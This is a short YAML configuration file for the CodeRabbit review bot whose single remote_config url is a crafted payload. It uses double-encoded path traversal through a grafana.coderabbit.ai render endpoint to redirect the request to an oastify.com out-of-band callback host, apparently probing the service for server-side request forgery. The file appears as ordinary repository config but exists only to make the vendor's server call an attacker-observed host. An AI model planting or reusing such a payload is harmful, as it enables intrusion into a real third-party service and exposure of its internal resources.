# yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json
remote_config:
  url: "https://grafana.coderabbit.ai/render/public/..%252f%255Cen51mntir0bd4f6ho1glbxu52w8nwrkg.oastify.com%252f%253F%252f..%252f.."
